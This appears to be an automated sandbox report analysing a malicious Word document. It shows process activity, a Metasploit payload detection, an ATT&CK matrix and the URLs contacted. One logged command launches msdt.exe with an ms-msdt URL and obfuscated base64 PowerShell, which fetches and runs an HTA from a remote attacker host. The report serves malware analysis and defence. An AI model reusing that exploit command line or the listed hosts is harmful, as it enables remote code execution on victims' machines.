Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xppvbwul\xppvbwul.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\s0ida0bj\s0ida0bj.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\hfyslwgs\hfyslwgs.dll	Jump to dropped file

Source: C:\Windows\SysWOW64\msdt.exe	Window / User API: threadDelayed 973			Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Window / User API: threadDelayed 416			Jump to behavior

Source: mshta.exe, 00000019.00000002.559412436.0000000000A46000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWdClass0
Source: mshta.exe, 00000019.00000002.559370717.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000019.00000002.559502075.0000000000A81000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.556934937.0000000002E27000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.556713488.0000000002DDA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'bQBzAGgAdABhACAAaAB0AHQAcAA6AC8ALwAxADUAOQAuADcANQAuADEAMwA1AC4AMQA2ADIAOgA2ADEAMgA1ADYALwBkAGwAbABoAG8AcwB0AC4AaAB0AGEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'bQBzAGgAdABhACAAaAB0AHQAcAA6AC8ALwAxADUAOQAuADcANQAuADEAMwA1AC4AMQA2ADIAOgA2ADEAMgA1ADYALwBkAGwAbABoAG8AcwB0AC4AaAB0AGEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5C8A.tmp" "c:\Users\user\AppData\Local\Temp\s0ida0bj\CSCC025FCB9965F4BC3896D6CAE016378F.TMP"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5BB.tmp" "c:\Users\user\AppData\Local\Temp\hfyslwgs\CSCD4B89031A8FB43F8B14D4D9332D5938.TMP"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES55EE.tmp" "c:\Users\user\AppData\Local\Temp\xppvbwul\CSC578DA5B3682742E2AA363EADA4BD665D.TMP"	Jump to behavior

Source: rundll32.exe, 0000001E.00000002.557302079.0000000003380000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 0000001E.00000002.557302079.0000000003380000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: rundll32.exe, 0000001E.00000002.557302079.0000000003380000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: rundll32.exe, 0000001E.00000002.557302079.0000000003380000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: WProgram Manager

Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00116~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\msdt.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Remote Access Functionality

Yara detected Metasploit Payload

Source: Yara match

File source: 0000001E.00000002.556428060.0000000002CE0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Command and Scripting Interpreter	1 DLL Side-Loading	12 Process Injection	11 Masquerading	OS Credential Dumping	1 Query Registry	Remote Services	1 Email Collection	Exfiltration Over Other Network Medium	11 Non-Standard Port	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	22 Exploitation for Client Execution	Boot or Logon Initialization Scripts	1 DLL Side-Loading	12 Process Injection	LSASS Memory	1 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	1 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	1 Extra Window Memory Injection	1 Rundll32	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 DLL Side-Loading	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	111 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Extra Window Memory Injection	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	14 System Information Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
V3g2Pfu707.docx	34%	Virustotal		Browse
V3g2Pfu707.docx	29%	ReversingLabs	Document-Word.Exploit.CVE-2017-0199

Dropped Files

Source	Detection	Scanner	Link
C:\Windows\Temp\SDIAG_4d4ccb62-1300-4c5f-92dc-0e3b25814c25\DiagPackage.dll	0%	Metadefender	Browse
C:\Windows\Temp\SDIAG_4d4ccb62-1300-4c5f-92dc-0e3b25814c25\DiagPackage.dll	0%	ReversingLabs
C:\Windows\Temp\SDIAG_4d4ccb62-1300-4c5f-92dc-0e3b25814c25\en-US\DiagPackage.dll.mui	0%	Metadefender	Browse
C:\Windows\Temp\SDIAG_4d4ccb62-1300-4c5f-92dc-0e3b25814c25\en-US\DiagPackage.dll.mui	0%	ReversingLabs

Source	Detection	Scanner	Label
https://roaming.edog.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://ofcrecsvcapi-int.azurewebsites.net/	0%	URL Reputation	safe
http://106.55.17.200/jquery-3.3.1.slim.min.js	0%	Avira URL Cloud	safe
https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h	0%	Avira URL Cloud	safe
http://159.75.135.162:61256/dllhost.htaindowsINetCookiesF&	0%	Avira URL Cloud	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://officeci.azurewebsites.net/api/	0%	URL Reputation	safe
http://159.75.135.162:61256/dllhost.htaV	0%	Avira URL Cloud	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
http://159.75.135.162:61256/dllhost.htaY	0%	Avira URL Cloud	safe
https://api.aadrm.com	0%	URL Reputation	safe
https://106.55.17.200:62002/	0%	Avira URL Cloud	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://api.addins.store.officeppe.com/addinstemplate	0%	URL Reputation	safe
http://159.75.135.162:61256/dllhost.htag	0%	Avira URL Cloud	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
http://159.75.135.162:61256/dllhost.htaET4.C:	0%	Avira URL Cloud	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://ncus.contentsync.	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://wus2.contentsync.	0%	URL Reputation	safe
https://asgsmsproxyapi.azurewebsites.net/	0%	URL Reputation	safe
https://106.55.17.200/	0%	Avira URL Cloud	safe
https://106.55.17.200:62002/jquery-3.3.1.slim.min.js	0%	Avira URL Cloud	safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	0%	URL Reputation	safe

Name	Malicious	Antivirus Detection	Reputation
http://106.55.17.200/jquery-3.3.1.slim.min.js	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.diagnosticssdf.office.com	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://login.microsoftonline.com/	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
https://shell.suite.office.com:1443	898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.dr	false		high
